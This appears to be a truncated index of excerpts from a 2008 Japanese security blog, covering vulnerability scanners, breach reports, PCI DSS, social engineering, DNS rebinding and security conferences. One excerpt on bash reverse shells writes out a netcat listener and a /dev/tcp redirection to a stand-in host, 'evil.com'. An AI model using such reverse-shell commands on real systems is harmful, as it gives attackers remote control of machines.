ふーん、こんなのあったんですね。Bruce Schneierさんと、Ross Andersonさんの大御所二人がブログでそれぞれ紹介してます。っていうか、二人とも Program Committeeのメンバーなのか。 そういえば、SPTのMLで案内がありましたが、9/30に情報セキュリティ大学…

マイクロソフトが推奨している HP(SPI)の SQL Injection自動検査ツール。WebInspectの簡易版みたいなものか?Download Scrawlr: The SQL Injection Detection Tool via kwout

Verizonからなかなか興味深いレポートが出ている。これは読まねば。 データの流失や盗難，87％は当然のセキュリティ対策で回避可能 | 日経 xTECH（クロステック） Verizon News Center | About Verizon Key Findings Examine Basic Security Tenets Some of …

知らない間にセキュmemoからリンクされてた。OpenVASは Nessusが v2から v3になってGPLじゃなくなった時に、Nessus v2をベースにして派生したプロジェクト。GPLでソースが配布されてる。全くフォローしていなかったが、現在も開発は継続されているようですね…

AppleからMac OS Xのセキュリティ設定ガイドが公開されている。OSベンダー自身からこういうのが出てくるのはいいことだ。CIS (Center for Internet Security)からも似たようなガイドがでているので見比べてみるとおもしろいかも。(まだどっちも見てません。)…

［データセンターを疑似攻撃］1万項目の約1％に問題見つかる | 日経 xTECH（クロステック） 外部からのセキュリティ攻撃に対する防御レベルを調べるため，ライブドアなどデータセンター事業者3社が合同で，検証実験を行った。4日間にわたる疑似攻撃によって…

ハードディスクのパスワードロックはなぜ破られた？ (1/3)：データを守るためにできること（1） - ＠ITHDDパスワード(ATAパスワード)についてよくまとまった記事。 一部の製品モデルでは、サービス領域内のパスワードが暗号化されずに保存されています。1台…

Bruce Schneier氏のエッセイから。彼がよく話すネタのひとつ。How to Sell Security - Schneier on Security （最後の部分のみ引用） Though effective, fear mongering is not very ethical. The better solution is not to sell security directly, but to…

というわけで、ケビン・ミトニック氏のセミナーに参加してきた。 講演タイトルは、"The Art of Deception"でソーシャルエンジニアリングがテーマ。同名タイトルの著書（「欺術」）を読んだことのある人だったら、大体想像のつく内容ではあった。それでも、ス…

これは小さいながらも結構影響あるんじゃないかな。脆弱性検査のサービスで Nessusを使っているところは多いはず。その Nessusのライセンス体系が 2008年7月31日から変更される。Tenable Network Securityのレターから • First, we will continue to enable …

とりあえず申し込む。講演タイトルは『日本における情報セキュリティの グローバル・スタンダード化を考える』（仮）とのこと。 ■開催日程 2008年5月19日（月）14時30分開場／15時00分開演 ■開催場所 砂防会館別館会議室（六甲） ※東京・千代田区平河町 ⇒大…

NGS Softwareといえば、David Litchfield氏などOracleのセキュリティに関する研究で有名で、多数のホワイトペーパーをだしている。その日本語版がNGSSQuirreLの代理店である三菱総研DCSから公開されたようだ。 (これまではユーザー向けにメールでのみ配信さ…

Dancho Dancevさんのブログから。実際に本物そっくりのフィッシングメールをユーザーに送り、ユーザーに体験してもらうことで、フィッシングに対する理解を深めようという趣旨のPhishMeというサービスがあるらしい。日本語でもできるのかなぁ？ What is Phis…

このところ各方面で話題になっているPCI DSS。(パスワードを90日で変更しろとかね) その中の要求事項 6.6では、ソースコードのレビューについて書かれている。(注：6/30までは要求事項ではなくてベストプラクティスでよい) Payment Card Industry (PCI) Data…

Ross Andersonさんの Security Engineering (邦訳: 情報セキュリティ技術大全)の第2版が今月出たが、いくつかの章がサンプルとして公開されている。もちろん第1版は引き続き全部が公開されている。第2版の日本語版も出るのかなぁ? Security Engineering - A …

http://www.microsoft.com/security/portal/sir.aspxVol.4(2007年7月〜12月)が公開されています。Key Findings Summaryは日本語版もありますね。興味深いところでは、全般的な攻撃数は増加(特にマルウェアの数は激増)しているものの、脆弱性自体の数は減少し…

上原先生のところから。 監査「する」リスク この件についてコメントはしませんが、これですぐ連想されるのは、じゃあセキュリティ監査も同じようなことが発生しうるの？ってこと。ペネストレーションした時に穴を見抜けなかったじゃないかって、事件発生後…

先日のエントリでISPによるサブドメインのハイジャック問題について書いたが、ToorCon Seattleで、Dan Kaminskyさんがこの問題を取り上げて発表したらしい。発表資料が公開されている。 ISP typo pimping exposes users to fraudulent web pages • The Regis…

Reverse Shell with Bash そうか、bashにはこんな機能もあったのね。使ったことないし。 ローカル(自分)側で netcatリスナーを起動。 $ nc -l -p 8080 -vvvリモート(相手)側で net redirectionを利用する。 $ exec 5<>/dev/tcp/evil.com/8080 $ cat <&5 | wh…

TechCrunch Japanese アーカイブ » Network Solutionsが未使用サブドメインをハイジャック via kwout これまたありえない話だが、数日前に実際に起きていたようだ。TechCrunchの記事によると、Network Solutionsは顧客が使用していないサブドメインへのアク…

TechCrunch Japanese アーカイブ » Tumblrに重大な脆弱性 via kwout 今日はtumblrでブロギングするには良い日ではない。Hacker Newsのある人物が気付いたところによると、Tumblrのユーザーがログインして、簡単な管理画面URLを入れるだけでサイトの管理画面…

「解読不能は数学的に証明済み」、RSAを超える新暗号方式とは − ＠IT 記事の中身についてはいろいろな方が書かれているので突っ込まないが、この記事を見てちょっと違うことを思った。セキュリティ関係の仕事をする上でいくつか必須というべき資質があるよう…

RSA Conference: Web Page Can Take Over Your Router | PCWorld Demo shows how web attack threatens fabric of the universe • The Register RSA Conferenceのセッションで Dan Kaminksyさんが DNS Rebindingによるホームルーター攻撃のデモをやったらし…

人間はめったにおこらないことの確率を正確に見積もれないらしい。。。: まるちゃんの情報セキュリティ気まぐれ日記 少し前の丸山さんのブログから。雑誌「Newton」の2008年4月号の記事の内容を紹介されている。 人はなぜ確率に弱いのか? 直感と計算の「ズレ…

今年の1/22に「システムに重大な不具合が見つかった」ために、オープン早々に閉鎖された(ISC)2のメンバーズコミュニティ。その後、まったく音沙汰がなかったのだが、今日になって事務局からCISSPホルダーあてにメールが届いた。 (ISC)2メンバーズコミュニテ…

Next-generation Web browsers? (SANS Internet Storm Center) Web Browserのセキュリティについて良くまとまっている。記事の中で紹介されているUS-CERTのページ(Securing Your Web Browser)では、IE、Firefox, Safariについて細かい推奨設定なども書かれて…

http://www.nowhere.dk/archives/2008/03/27/ordb_org_is_dead_and_gone/ 3/25からORDB.orgが全てのクエリーに対して 127.0.0.1を返すように設定されて、世界中でちょっとした騒ぎになっている。JPCERT/CCからも注意喚起(ORDB.org の DNSBL による広域メール…

1日目の様子はこちら。 プレゼン資料はこちらで公開されている。この日は途中参加。 Distibuted security incident response organization -- Torsten Enquist (TeliaSonera-CERT, SE) http://www.teliasonera.com/TeliaSonera-CERTの活動の紹介。TeliaSoner…

Joint Workshop on Security 2008, Tokyo 開催記録サイト（資料は順次公開される予定） 3/25と3/26の2日間にわたってJoint Workshop on Security 2008が秋葉原で開催されている。これはFIRST TC（3/27-28）の開催に先立って行われる、一般参加が可能なワーク…

Can your computer keep a secret? Why all laptop data protection methods are NOT created equal Part I: Hard Drive Passwords Easily Defeated; the Truth about Data Protection Part II: Software Solutions for Encrypting Data at Rest Part III: N…